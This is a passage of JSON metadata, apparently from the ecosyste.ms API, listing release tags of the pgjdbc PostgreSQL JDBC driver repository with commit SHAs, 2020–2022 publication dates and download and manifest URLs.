rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3/manifests"},{"name":"REL42.3.3-rc1","sha":"9effea487dca529dc5cb0e71600a8c6509819c56","kind":"tag","published_at":"2022-02-15T19:07:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3-rc1/manifests"},{"name":"REL42.2.25","sha":"6f64a38627c12f8b515c8862682572cd1aff0ff8","kind":"tag","published_at":"2022-02-01T20:20:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.25","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25/manifests"},{"name":"REL42.2.25-rc1","sha":"6f64a38627c12f8b515c8862682572cd1aff0ff8","kind":"tag","published_at":"2022-02-01T20:17:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.25-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.25-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.25-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25-rc1/manifests"},{"name":"REL42.3.2-rc2","sha":"728c04ee8d26dcc4bca51503c2e93ad87ef8ce87","kind":"tag","published_at":"2022-02-01T14:52:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc2/manifests"},{"name":"REL42.3.2","sha":"728c04ee8d26dcc4bca51503c2e93ad87ef8ce87","kind":"commit","published_at":"2022-02-01T14:47:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2/manifests"},{"name":"REL42.3.2-rc1","sha":"cfc4b1106b8f4931dee8241671c3880f5f947727","kind":"tag","published_at":"2022-01-31T19:31:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc1/manifests"},{"name":"REL42.3.1","sha":"3cf846e019767590cc1a4c1b90246ebc26bc5130","kind":"tag","published_at":"2021-10-29T17:23:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1/manifests"},{"name":"REL42.3.1-rc2","sha":"3cf846e019767590cc1a4c1b90246ebc26bc5130","kind":"tag","published_at":"2021-10-29T17:18:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc2/manifests"},{"name":"REL42.3.1-rc1","sha":"b3050e60f81b4e43fae452bcf6df297df2048ae4","kind":"tag","published_at":"2021-10-28T16:27:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc1/manifests"},{"name":"REL42.3.0","sha":"6d93eb817f334b383d2c8716a50d8c1255e24236","kind":"tag","published_at":"2021-10-18T15:17:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0/manifests"},{"name":"REL42.3.0-rc2","sha":"6d93eb817f334b383d2c8716a50d8c1255e24236","kind":"tag","published_at":"2021-10-15T12:59:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc2/manifests"},{"name":"REL42.2.24","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:15:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24/manifests"},{"name":"REL42.2.24-rc2","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:05:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc2/manifests"},{"name":"REL42.2.24-rc1","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:02:30.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc1/manifests"},{"name":"REL42.2.23","sha":"d985dc19945dce93e09863b44118896927ef6d1f","kind":"tag","published_at":"2021-07-06T15:41:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23/manifests"},{"name":"REL42.2.23-rc6","sha":"d985dc19945dce93e09863b44118896927ef6d1f","kind":"tag","published_at":"2021-07-06T15:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc6/manifests"},{"name":"REL42.2.23-rc5","sha":"624d8b88dde210447f921725682ebd58e7466bf0","kind":"tag","published_at":"2021-07-05T15:30:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc5/manifests"},{"name":"REL42.2.23-rc4","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T14:55:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc4/manifests"},{"name":"REL42.2.23-rc3","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T12:52:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc3/manifests"},{"name":"REL42.2.23-rc1","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T12:37:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc1/manifests"},{"name":"REL42.2.22-rc1","sha":"466bad19c4340c3808b718cad0ea8e0f347a28b3","kind":"tag","published_at":"2021-06-16T15:08:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.22-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.22-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.22-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22-rc1/manifests"},{"name":"REL42.2.22","sha":"466bad19c4340c3808b718cad0ea8e0f347a28b3","kind":"commit","published_at":"2021-06-16T14:49:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.22","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22/manifests"},{"name":"REL42.2.21","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:44:08.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21/manifests"},{"name":"REL42.2.21-rc2","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:23:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc2/manifests"},{"name":"REL42.2.21-rc1","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:21:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc1/manifests"},{"name":"REL42.2.20","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T13:23:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20/manifests"},{"name":"REL42.2.20-rc2","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T13:03:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc2/manifests"},{"name":"REL42.2.20-rc1","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T12:37:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc1/manifests"},{"name":"REL42.2.19","sha":"207ce36ec2c5cce30c454afa3e51f39bbe5bd26b","kind":"tag","published_at":"2021-02-18T19:32:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19/manifests"},{"name":"REL42.2.19-rc2","sha":"207ce36ec2c5cce30c454afa3e51f39bbe5bd26b","kind":"tag","published_at":"2021-02-18T18:45:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc2/manifests"},{"name":"REL42.2.19-rc1","sha":"18cec592278e7f16bacdd5083017686be41d9da6","kind":"tag","published_at":"2021-02-18T15:21:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc1/manifests"},{"name":"REL42.2.18","sha":"7b7d2a9140dba1733cdd4bb720912621578ba846","kind":"tag","published_at":"2020-10-15T13:45:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.18","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18/manifests"},{"name":"REL42.2.18-rc1","sha":"7b7d2a9140dba1733cdd4bb720912621578ba846","kind":"tag","published_at":"2020-10-15T13:12:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.18-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.18-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.18-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18-rc1/manifests"},{"name":"REL42.2.17","sha":"901962b028e6061227bfd2124ab6e245e9c952a3","kind":"tag","published_at":"2020-10-09T13:43:49.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.17","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17/manifests"},{"name":"REL42.2.17-rc1","sha":"901962b028e6061227bfd2124ab6e245e9c952a3","kind":"tag","published_at":"2020-10-09T12:29:44.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.17-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.17-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.17-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17-rc1/manifests"},{"name":"REL42.2.16","sha":"5e4bbc88ccea2e9ff1f9bb02e3d17893a6f630e3","kind":"tag","published_at":"2020-08-21T19:33:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16/manifests"},{"name":"REL42.2.16-rc2","sha":"5e4bbc88ccea2e9ff1f9bb02e3d17893a6f630e3","kind":"tag","published_at":"2020-08-21T18:15:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc2/manifests"},{"name":"REL42.2.16-rc1","sha":"3792f47ebfad1f7c746abcc1f6ed6d0411fbbb0c","kind":"tag","published_at":"2020-08-21T17:04:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc1/manifests"},{"name":"REL42.2.15","sha":"3802b453608349b11a81585f3dbca9f623687d3d","kind":"tag","published_at":"2020-08-14T18:24:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15/manifests"},{"name":"REL42.2.15-rc2","sha":"3802b453608349b11a81585f3dbca9f623687d3d","kind":"tag","published_at":"2020-08-07T15:16:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc2/manifests"},{"name":"REL42.2.15-rc1","sha":"6bacf8d4570e8a23e6f57cf3138a68725b4b4ad6","kind":"tag","published_at":"2020-06-19T16:39:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15-rc1","tag_url":"https://repos.